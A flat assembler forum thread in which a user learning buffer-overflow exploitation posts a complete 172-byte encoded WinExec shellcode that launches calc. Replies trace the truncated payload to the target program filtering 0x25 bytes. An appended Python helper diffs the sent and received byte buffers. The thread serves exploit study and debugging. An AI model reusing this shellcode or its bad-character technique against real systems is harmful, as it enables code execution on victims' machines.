flat assembler
Message board for the users of flat assembler.

define byte problem

Overflowz
Joined: 03 Sep 2010
Posts: 1046
Hello everyone! I have a problem here. First of all, I'm studying stack/buffer overflows and writing exploits in asm as well. Now, my problem is when I'm doing something like this:
Code:
shellcode:
db 172 dup 0x41

and after attaching the vulnerable application to a debugger, I don't see any 0x41 instructions there.. BUT, when I'm using this shellcode:
Code:
;WinExec - calc 172 bytes
shellcode:
db 0x31, 0xc9, 0x83, 0xe9, 0xdb, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 0xd8
db 0x22, 0x72, 0xe4, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0x24, 0xca, 0x34, 0xe4, 0xd8, 0x22, 0xf9, 0xa1
db 0xe4, 0xa9, 0x0e, 0xe1, 0xa0, 0x23, 0x9d, 0x6f, 0x97, 0x3a, 0xf9, 0xbb, 0xf8, 0x23, 0x99, 0x07
db 0xf6, 0x6b, 0xf9, 0xd0, 0x53, 0x23, 0x9c, 0xd5, 0x18, 0xbb, 0xde, 0x60, 0x18, 0x56, 0x75, 0x25
db 0x12, 0x2f, 0x73, 0x26, 0x33, 0xd6, 0x49, 0xb0, 0xfc, 0x26, 0x07, 0x07, 0x53, 0x7d, 0x56, 0xe5
db 0x33, 0x44, 0xf9, 0xe8, 0x93, 0xa9, 0x2d, 0xf8, 0xd9, 0xc9, 0xf9, 0xf8, 0x53, 0x23, 0x99, 0x6d
db 0x84, 0x06, 0x76, 0x27, 0xe9, 0xe2, 0x16, 0x6f, 0x98, 0x12, 0xf7, 0x24, 0xa0, 0x2d, 0xf9, 0xa4
db 0xd4, 0xa9, 0x02, 0xf8, 0x75, 0xa9, 0x1a, 0xec, 0x31, 0x29, 0x72, 0xe4, 0xd8, 0xa9, 0x32, 0xd0
db 0xdd, 0x5e, 0x72, 0xe4, 0xd8, 0xa9, 0x1a, 0xd8, 0x87, 0x13, 0x84, 0x84, 0x8e, 0xc9, 0x7f, 0x8c
db 0x28, 0xa8, 0x76, 0xbb, 0xb0, 0xba, 0x8c, 0x6e, 0xd6, 0x75, 0x8d, 0x03, 0x30, 0xcc, 0x8d, 0x1b
db 0x27, 0x41, 0x13, 0x88, 0xbb, 0x0c, 0x17, 0x9c, 0xbd, 0x22, 0x72, 0xe4

I see the instructions and it works fine!
The reason I'm posting it here is that instead of
Code:
shellcode:
db 172 dup 0x41

I did this and it worked like a charm!
Code:
shellcode:
db 170 dup 0x41

My question is, is there something wrong with the db/dup macros?
Thank you.
Post 02 Jun 2011, 21:23
bitshifter
Joined: 04 Dec 2007
Posts: 764
Location: Massachusetts, USA
Well, using the fasm listing tool we can see the output is correct (or at least as expected):
Code:
00000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       db 172 dup 0x41
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41    
Post 03 Jun 2011, 02:23
Overflowz
bitshifter, then it's the program's problem? I can't find any difference.. only the addresses there.
Here are the pics.

[Attachment: shellcode.JPG, "shellcode, WinExec - calc 172 bytes"]

[Attachment: 0x41-dups.JPG, "0x41 with dups; 172 bytes"]

Post 03 Jun 2011, 07:52
Overflowz
I've counted the sizes of the sent and the original shellcode.
sent - 170 bytes
original - 172 bytes
I guess 2 bytes were filtered by the program.. Am I right?
EDIT:
Ha! I found it! The program filters 0x25 (the % symbol) and the next 2 bytes, replacing them with something..
Original:
Code:
db 0x25, 0x12, 0x2f

Becomes:
Code:
db 0x00

That's why 2 bytes are missing ))
Thread closed now.
Post 03 Jun 2011, 09:56
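The thread settles the question by counting bytes by hand and scanning for the run that changed. Here is an added Python example (written for this page, not code from the thread or from fasm) that does the same mechanically: it assembles the `db`/`dup` lines into bytes, then diffs the buffer that was sent against what the debugger shows, so the rewritten run and its offset fall out directly. The "received" buffer and the sample source are constructed to match the final post's report (0x25 0x12 0x2f arriving as a single 0x00).

```python
import re

# One fasm-style `db` line: capture the operand list, drop any `;` comment.
DB_LINE = re.compile(r"^\s*db\s+(.*?)\s*(?:;.*)?$", re.IGNORECASE)

def parse_db(source: str) -> bytes:
    """Assemble fasm-style `db` lines into bytes: comma-separated values and
    the `count dup value` form (`db 172 dup 0x41`); other lines are skipped."""
    out = bytearray()
    for line in source.splitlines():
        m = DB_LINE.match(line)
        if not m:
            continue
        for item in m.group(1).split(","):
            dup = re.fullmatch(r"(\S+)\s+dup\s+(\S+)", item.strip(), re.IGNORECASE)
            if dup:
                out += bytes([int(dup.group(2), 0)]) * int(dup.group(1), 0)
            else:
                out.append(int(item.strip(), 0))
    return bytes(out)

def locate_change(sent: bytes, received: bytes):
    """Strip the common prefix and suffix, as the thread did by hand; the run left
    in the middle is what the program rewrote. Returns (offset, original_run,
    replaced_run), or None when the buffers are identical."""
    if sent == received:
        return None
    limit = min(len(sent), len(received))
    p = 0
    while p < limit and sent[p] == received[p]:
        p += 1
    s = 0
    while s < limit - p and sent[-1 - s] == received[-1 - s]:
        s += 1
    return p, sent[p:len(sent) - s], received[p:len(received) - s]

# Constructed sample in the thread's syntax: the final post's three-byte run, padded on both sides.
SAMPLE = """shellcode:
db 2 dup 0x41          ; padding
db 0x25, 0x12, 0x2f    ; run reported as collapsing to a single 0x00
db 0x43, 0x44
"""
# Constructed to match the thread's report (0x25 0x12 0x2f became 0x00):
# what the debugger would show, 7 bytes sent arriving as 5.
RECEIVED = b"\x41\x41\x00\x43\x44"

def demo():
    """Return (sent length, received length, altered run) for the sample."""
    sent = parse_db(SAMPLE)
    return len(sent), len(RECEIVED), locate_change(sent, RECEIVED)
```

The same two functions applied to the full 172-byte payload and the 170 bytes seen in the debugger would report offset, original run and replacement in one call.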
Copyright © 1999-2020, Tomasz Grysztar.